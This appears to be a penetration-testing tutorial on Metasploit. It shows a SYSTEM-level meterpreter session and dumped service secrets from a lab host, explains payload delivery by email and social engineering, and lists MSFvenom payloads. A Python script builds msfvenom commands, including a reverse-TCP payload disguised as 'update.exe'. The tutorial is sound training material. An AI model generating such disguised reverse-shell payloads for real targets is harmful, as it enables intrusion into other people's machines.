Id  Name         Type         Information                 Connection
--  ----         ----         -----------                 ----------
1   meterpreter  x86/windows  NT AUTHORITY\SYSTEM @ MS01  10.10.10.129:443 -> 10.10.10.205:50501 (10.10.10.205)
Command                   Description
-------                   -----------
?                         Help menu
background                Backgrounds the current session
bg                        Alias for background
bgkill                    Kills a background meterpreter script
bglist                    Lists running background scripts
bgrun                     Executes a meterpreter script as a background thread
channel                   Displays information or control active channels
close                     Closes a channel
disable_unicode_encoding  Disables encoding of unicode strings
enable_unicode_encoding   Enables encoding of unicode strings
exit                      Terminate the meterpreter session
get_timeouts              Get the current session timeout values
guid                      Get the session GUID
help                      Help menu
info                      Displays information about a Post module
irb                       Open an interactive Ruby shell on the current session
load                      Load one or more meterpreter extensions
machine_id                Get the MSF ID of the machine attached to the session
migrate                   Migrate the server to another process
pivot                     Manage pivot listeners
pry                       Open the Pry debugger on the current session
quit                      Terminate the meterpreter session
read                      Reads data from a channel
resource                  Run the commands stored in a file
run                       Executes a meterpreter script or Post module
secure                    (Re)Negotiate TLV packet encryption on the session
sessions                  Quickly switch to another session
set_timeouts              Set the current session timeout values
sleep                     Force Meterpreter to go quiet, then re-establish session.
transport                 Change the current transport mechanism
use                       Deprecated alias for "load"
uuid                      Get the UUID for the current session
write                     Writes data to a channel
Secret : _SC_Alerter / service 'Alerter' with username : NT AUTHORITY\LocalService
Secret : _SC_ALG / service 'ALG' with username : NT AUTHORITY\LocalService
Secret : _SC_aspnet_state / service 'aspnet_state' with username : NT AUTHORITY\NetworkService
Secret : _SC_Dhcp / service 'Dhcp' with username : NT AUTHORITY\NetworkService
Secret : _SC_Dnscache / service 'Dnscache' with username : NT AUTHORITY\NetworkService
Secret : _SC_LicenseService / service 'LicenseService' with username : NT AUTHORITY\NetworkService
Secret : _SC_LmHosts / service 'LmHosts' with username : NT AUTHORITY\LocalService
Secret : _SC_MSDTC / service 'MSDTC' with username : NT AUTHORITY\NetworkService
Secret : _SC_RpcLocator / service 'RpcLocator' with username : NT AUTHORITY\NetworkService
Secret : _SC_RpcSs / service 'RpcSs' with username : NT AUTHORITY\NetworkService
Secret : _SC_stisvc / service 'stisvc' with username : NT AUTHORITY\LocalService
Secret : _SC_TlntSvr / service 'TlntSvr' with username : NT AUTHORITY\LocalService
Secret : _SC_WebClient / service 'WebClient' with username : NT AUTHORITY\LocalService
MSFvenom
Overview
Using Metasploit's automated exploitation requires that we can reach a vulnerable target machine over the network. To run the exploit module, deliver the payload and establish the shell session, we first have to be able to communicate with the system, either by being present on the internal network or by being on a network that has a route to the network the target sits on. There will be situations where we have no direct network access to the vulnerable target machine at all. In those cases we need to get creative about how the payload is delivered to the system and executed there. One such way is to use MSFvenom to craft a payload and send it in an email message, or through another social-engineering vector, to get a user to execute the file.
Name                                          Description
----                                          -----------
linux/x86/shell/reverse_nonx_tcp              Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp                   Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp_uuid              Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell_bind_ipv6_tcp                 Listen for a connection over IPv6 and spawn a command shell
linux/x86/shell_bind_tcp                      Listen for a connection and spawn a command shell
linux/x86/shell_bind_tcp_random_port          Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.
linux/x86/shell_find_port                     Spawn a shell on an established connection
linux/x86/shell_find_tag                      Spawn a shell on an established connection (proxy/nat safe)
linux/x86/shell_reverse_tcp                   Connect back to attacker and spawn a command shell
linux/x86/shell_reverse_tcp_ipv6              Connect back to attacker and spawn a command shell over IPv6
linux/zarch/meterpreter_reverse_http          Run the Meterpreter / Mettle server payload (stageless)
linux/zarch/meterpreter_reverse_https         Run the Meterpreter / Mettle server payload (stageless)
linux/zarch/meterpreter_reverse_tcp           Run the Meterpreter / Mettle server payload (stageless)
mainframe/shell_reverse_tcp                   Listen for a connection and spawn a command shell. This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.
multi/meterpreter/reverse_http                Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTP
multi/meterpreter/reverse_https               Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTPS
netware/shell/reverse_tcp                     Connect to the NetWare console (staged). Connect back to the attacker
nodejs/shell_bind_tcp                         Creates an interactive shell via nodejs
nodejs/shell_reverse_tcp                      Creates an interactive shell via nodejs
nodejs/shell_reverse_tcp_ssl                  Creates an interactive shell via nodejs, uses SSL
osx/armle/execute/bind_tcp                    Spawn a command shell (staged). Listen for a connection
osx/armle/execute/reverse_tcp                 Spawn a command shell (staged). Connect back to the attacker
osx/armle/shell/bind_tcp                      Spawn a command shell (staged). Listen for a connection
osx/armle/shell/reverse_tcp                   Spawn a command shell (staged). Connect back to the attacker
osx/armle/shell_bind_tcp                      Listen for a connection and spawn a command shell
osx/armle/shell_reverse_tcp                   Connect back to attacker and spawn a command shell
osx/armle/vibrate                             Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller
windows/dllinject/bind_hidden_tcp             Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/dllinject/bind_ipv6_tcp               Inject a DLL via a reflective loader. Listen for an IPv6 connection (Windows x86)
windows/dllinject/bind_ipv6_tcp_uuid          Inject a DLL via a reflective loader. Listen for an IPv6 connection with UUID Support (Windows x86)
windows/dllinject/bind_named_pipe             Inject a DLL via a reflective loader. Listen for a pipe connection (Windows x86)
windows/dllinject/bind_nonx_tcp               Inject a DLL via a reflective loader. Listen for a connection (No NX)
windows/dllinject/bind_tcp                    Inject a DLL via a reflective loader. Listen for a connection (Windows x86)
windows/dllinject/bind_tcp_rc4                Inject a DLL via a reflective loader. Listen for a connection
windows/dllinject/bind_tcp_uuid               Inject a DLL via a reflective loader. Listen for a connection with UUID Support (Windows x86)
windows/dllinject/find_tag                    Inject a DLL via a reflective loader. Use an established connection
windows/dllinject/reverse_hop_http            Inject a DLL via a reflective loader. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.
windows/dllinject/reverse_http                Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows wininet)
windows/dllinject/reverse_http_proxy_pstore   Inject a DLL via a reflective loader. Tunnel communication over HTTP
windows/dllinject/reverse_ipv6_tcp            Inject a DLL via a reflective loader. Connect back to the attacker over IPv6
windows/dllinject/reverse_nonx_tcp            Inject a DLL via a reflective loader. Connect back to the attacker (No NX)
windows/dllinject/reverse_ord_tcp             Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp                 Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_allports        Inject a DLL via a reflective loader. Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/dllinject/reverse_tcp_dns             Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_rc4             Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_rc4_dns         Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_uuid            Inject a DLL via a reflective loader. Connect back to the attacker with UUID Support
windows/dllinject/reverse_winhttp             Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows winhttp)
The listing shows some details that help us understand the payloads further. First, a payload's name almost always starts with the target platform (Linux, Windows, macOS, mainframe, and so on), optionally followed by the architecture. We can also see that some payloads are described as (staged) or (stageless). In Metasploit's naming scheme the two are told apart by the separator between the stage and the stager: a slash, as in linux/x86/shell/reverse_tcp, means staged, where a small stager connects first and then fetches the rest of the payload from the handler; an underscore, as in linux/x86/shell_reverse_tcp, means stageless, where the whole payload ships in one piece and needs nothing further from the handler once it runs.
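As an added example (not code from the page or from the Metasploit project), the script below turns the naming convention just described into a classifier: it parses lines in the shape of the `msfvenom -l payloads` listing, splits each name into platform, architecture, stage, stager direction (reverse/bind/find) and transport, decides staged versus stageless from the slash-versus-underscore rule (letting an explicit "(staged)"/"(stageless)" in the description override the guess), and builds the matching `msfvenom` argument list, which is where the distinction matters in practice: a reverse payload needs the attacker's LHOST/LPORT baked in, a bind payload only a port for the target to listen on. The sample listing is constructed from names that appear above; the architecture set and the treatment of payloads whose names do not follow the convention (cmd/* and multi/* entries) are assumptions of this example.

```python
"""Classify Metasploit payload names by the naming convention described above.

    platform[/arch]/stage/stager   e.g. linux/x86/shell/reverse_tcp   -> staged
    platform[/arch]/stage_stager   e.g. linux/x86/shell_reverse_tcp   -> stageless

Heuristic for the native payload paths shown in the listing; names under
cmd/ and multi/ do not reliably encode staging, so treat those as a hint only
(assumption of this example).
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterator, Optional

# Constructed sample in the shape of `msfvenom -l payloads` output. The names
# come from the listing on this page; the descriptions are shortened.
SAMPLE_LISTING = """\
    Name                                   Description
    ----                                   -----------
    linux/x86/shell/reverse_tcp            Spawn a command shell (staged). Connect back to the attacker
    linux/x86/shell_reverse_tcp            Connect back to attacker and spawn a command shell
    linux/x86/shell_bind_tcp_random_port   Listen for a connection in a random port and spawn a command shell.
    linux/zarch/meterpreter_reverse_https  Run the Meterpreter / Mettle server payload (stageless)
    windows/dllinject/reverse_tcp          Inject a DLL via a reflective loader. Connect back to the attacker
    windows/dllinject/bind_named_pipe      Inject a DLL via a reflective loader. Listen for a pipe connection (Windows x86)
    windows/dllinject/find_tag             Inject a DLL via a reflective loader. Use an established connection
    nodejs/shell_reverse_tcp_ssl           Creates an interactive shell via nodejs, uses SSL
    osx/armle/vibrate                      Causes the iPhone to vibrate
"""

# Architecture tokens that may appear as the second path component (assumed set).
KNOWN_ARCHES = {"x86", "x64", "armle", "aarch64", "mipsle", "mipsbe",
                "mips64", "ppc", "ppc64", "zarch"}

# <stage>_<direction>_<transport>, stage part optional: 'reverse_tcp' (a bare
# stager) and 'shell_reverse_tcp' (a stageless single) both match.
_CONN = re.compile(r"^(?:(?P<stage>.+?)_)?(?P<direction>reverse|bind|find)_(?P<transport>.+)$")


@dataclass(frozen=True)
class PayloadInfo:
    name: str
    platform: str
    arch: Optional[str]
    stage: str        # what runs on the target: shell, meterpreter, dllinject, ...
    kind: str         # 'staged' or 'stageless'
    direction: str    # 'reverse', 'bind', 'find', or 'none'
    transport: str    # tcp, https, named_pipe, ... ('' when direction is 'none')
    description: str


def parse_listing(text: str) -> Iterator[tuple[str, str]]:
    """Yield (name, description) pairs; header/separator rows have no '/' in them."""
    for raw in text.splitlines():
        name, _, desc = raw.strip().partition(" ")
        if "/" in name:
            yield name, desc.strip()


def classify(name: str, description: str = "") -> PayloadInfo:
    parts = name.split("/")
    platform, rest = parts[0], parts[1:]
    arch = rest.pop(0) if rest and rest[0] in KNOWN_ARCHES else None
    if not rest:
        raise ValueError(f"not a payload path: {name}")
    last = rest[-1]
    m = _CONN.match(last)
    if m is None:
        # No stager in the name (osx/armle/vibrate): a single that never calls a handler.
        return PayloadInfo(name, platform, arch, last, "stageless", "none", "", description)
    if len(rest) >= 2 and m.group("stage") is None:
        kind, stage = "staged", rest[-2]          # stage and stager split by '/'
    else:
        kind, stage = "stageless", m.group("stage") or last
    if "(staged)" in description:                 # explicit listing text wins
        kind = "staged"
    elif "(stageless)" in description:
        kind = "stageless"
    return PayloadInfo(name, platform, arch, stage, kind,
                       m.group("direction"), m.group("transport"), description)


def msfvenom_argv(info: PayloadInfo, lhost: str, lport: int, fmt: str, out: str) -> list[str]:
    """Build the msfvenom command line for a payload. A reverse payload needs the
    attacker's LHOST/LPORT to call back to; a bind payload only takes the port the
    target will listen on; find_* payloads take neither."""
    argv = ["msfvenom", "-p", info.name]
    if info.direction == "reverse":
        argv += [f"LHOST={lhost}", f"LPORT={lport}"]
    elif info.direction == "bind":
        argv += [f"LPORT={lport}"]
    return argv + ["-f", fmt, "-o", out]


def summarize(text: str) -> dict[str, int]:
    """Count the payloads in a listing by 'kind/direction', e.g. {'staged/reverse': 2}."""
    counts: dict[str, int] = {}
    for name, desc in parse_listing(text):
        info = classify(name, desc)
        key = f"{info.kind}/{info.direction}"
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    for name, desc in parse_listing(SAMPLE_LISTING):
        i = classify(name, desc)
        print(f"{i.name:40} {i.platform:8} {i.arch or '-':6} {i.stage:12} "
              f"{i.kind:9} {i.direction:7} {i.transport}")
    print(summarize(SAMPLE_LISTING))
    print(" ".join(msfvenom_argv(classify("windows/dllinject/reverse_tcp"),
                                 "10.10.14.5", 443, "exe", "update.exe")))
```

The description override matters because the slash rule is a convention, not a guarantee; when the listing says "(staged)" outright, trust it over the name. The summary is a quick way to see, for a platform you are targeting, how many of the available payloads need a listener on your side (reverse) versus an inbound connection to the target (bind), which is exactly the choice the delivery scenario above forces.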